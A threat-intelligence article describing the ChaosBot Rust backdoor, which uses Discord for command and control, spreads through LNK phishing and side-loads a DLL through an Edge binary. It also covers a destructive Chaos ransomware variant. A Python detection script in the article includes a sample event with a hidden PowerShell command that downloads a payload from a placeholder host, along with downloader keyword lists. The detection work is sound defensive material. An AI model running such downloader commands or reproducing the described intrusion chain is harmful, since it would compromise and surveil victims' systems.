A new Rust-based malware dubbed “ChaosBot” has emerged that uses Discord channels to control victims’ computers. Cybersecurity researchers have detailed this backdoor, which lets threat actors execute commands and conduct reconnaissance on compromised systems. The malware was first detected in a financial services environment in late September 2025.
ChaosBot stands out for its abuse of Discord for command-and-control (C2) operations. Operated by an individual using the pseudonym “chaos_00019,” the malware uses Discord channels to issue remote commands to infected devices. A second Discord account, “lovebb0024,” is also linked to the malware’s C2 activity.
Beyond its Discord C2, ChaosBot has been observed propagating through phishing messages that carry malicious Windows shortcut (LNK) files. Opening the LNK runs a PowerShell command that downloads and executes ChaosBot, while a decoy PDF masquerading as legitimate correspondence is displayed to divert attention.
The malware’s payload, a malicious DLL named “msedge_elf.dll,” is side-loaded by the legitimate Microsoft Edge binary “identity_helper.exe.” Once running, it performs system reconnaissance and deploys a fast reverse proxy (FRP) to maintain persistent access inside compromised networks. Attempts to configure a Visual Studio Code Tunnel service as an additional backdoor have also been documented.
ChaosBot interacts with a Discord channel associated with the victim’s computer name to receive instructions from the operator. Supported commands include shell execution via PowerShell, screenshot capture, file downloads, and uploads. The malware employs evasion techniques to circumvent detection, such as patching system instructions and checking for virtual machine environments.
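One way to turn the chain described above (LNK-launched PowerShell downloader, msedge_elf.dll loaded by identity_helper.exe, Discord C2) into host-telemetry detections, as an added example that is not code from the article or from any vendor. It assumes Sysmon-style fields (image, parent_image, command_line, module, dest_host) and the standard Edge install directories; the sample events are constructed.

```python
"""Detection rules for the ChaosBot chain (added example). Events are constructed,
Sysmon-style dicts; field names and Edge install paths are assumptions."""
EDGE_DIRS = (r"c:\program files (x86)\microsoft\edge\application",
             r"c:\program files\microsoft\edge\application")  # assumed legit paths
DOWNLOAD_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest")
def _under_edge_dir(path: str) -> bool:
    return path.lower().startswith(EDGE_DIRS)

def detect(event: dict) -> list[str]:
    """Return findings for one event; an empty list means nothing matched."""
    findings = []
    kind, image = event.get("type"), event.get("image", "").lower()
    if kind == "process_create":
        parent = event.get("parent_image", "").lower()
        cmd = event.get("command_line", "").lower()
        # LNK opened in Explorer spawns PowerShell that fetches the payload.
        if (image.endswith("powershell.exe") and parent.endswith("explorer.exe")
                and any(m in cmd for m in DOWNLOAD_MARKERS)):
            findings.append("PowerShell downloader launched from Explorer (LNK lure)")
    elif kind == "image_load":
        module = event.get("module", "").lower()
        # identity_helper.exe should load msedge_elf.dll only from the Edge install.
        if (image.endswith("identity_helper.exe") and module.endswith("msedge_elf.dll")
                and not (_under_edge_dir(image) and _under_edge_dir(module))):
            findings.append("identity_helper.exe side-loading msedge_elf.dll outside Edge install")
    elif kind == "network_connect":
        host = event.get("dest_host", "").lower()
        # The process hosting the payload reaching Discord: candidate C2 traffic.
        if image.endswith("identity_helper.exe") and host.endswith("discord.com"):
            findings.append("identity_helper.exe connecting to Discord (possible C2)")
    return findings

def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map event index -> findings for every event that produced at least one."""
    return {i: f for i, e in enumerate(events) if (f := detect(e))}

# Constructed sample telemetry; paths and hosts are placeholders, not real IoCs.
PS = r"c:\windows\system32\windowspowershell\v1.0\powershell.exe"
EDGE = r"c:\program files (x86)\microsoft\edge\application"
SAMPLE_EVENTS = [
    {"type": "process_create", "parent_image": r"c:\windows\explorer.exe", "image": PS,
     "command_line": "powershell -c Get-ChildItem C:\\Reports"},                 # benign
    {"type": "process_create", "parent_image": r"c:\windows\explorer.exe", "image": PS,
     "command_line": "powershell -w hidden -c Invoke-WebRequest https://example.invalid/p -OutFile p"},
    {"type": "image_load", "image": r"c:\users\public\identity_helper.exe",
     "module": r"c:\users\public\msedge_elf.dll"},
    {"type": "image_load", "image": EDGE + r"\identity_helper.exe",
     "module": EDGE + r"\msedge_elf.dll"},                                        # benign
    {"type": "network_connect", "image": r"c:\users\public\identity_helper.exe",
     "dest_host": "discord.com"},
]
```

Running `scan(SAMPLE_EVENTS)` flags events 1, 2 and 4 and leaves the two benign records (Edge components in their install directory, a harmless PowerShell command) unflagged.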
Fortinet FortiGuard Labs recently disclosed a new variant of Chaos ransomware written in C++, introducing destructive capabilities to delete files and manipulate clipboard content for cryptocurrency theft. This evolution signifies a shift towards more aggressive and multifaceted threats aimed at maximizing financial gain.
The Chaos-C++ ransomware downloader masquerades as fake utilities to deceive users into installation. It employs a combination of encryption methods and a versatile downloader to ensure successful execution. By incorporating destructive encryption and clipboard hijacking, the ransomware aims to enhance its financial fraud capabilities.
Chaos-C++ ransomware’s operational modes include monitoring the system clipboard, inhibiting recovery processes, and selectively encrypting files based on size. Previous iterations of Chaos ransomware, like Lucky_Gh0$t, were distributed under different disguises. The malware’s robust encryption methods make disruption challenging, enhancing its efficacy and resilience.
The emergence of Rust-based malware like ChaosBot underscores the evolving landscape of cyber threats, highlighting the adaptability and sophistication of malicious actors. As cybersecurity defenses continue to evolve, staying vigilant and proactive is crucial to mitigating the risks posed by such advanced threats.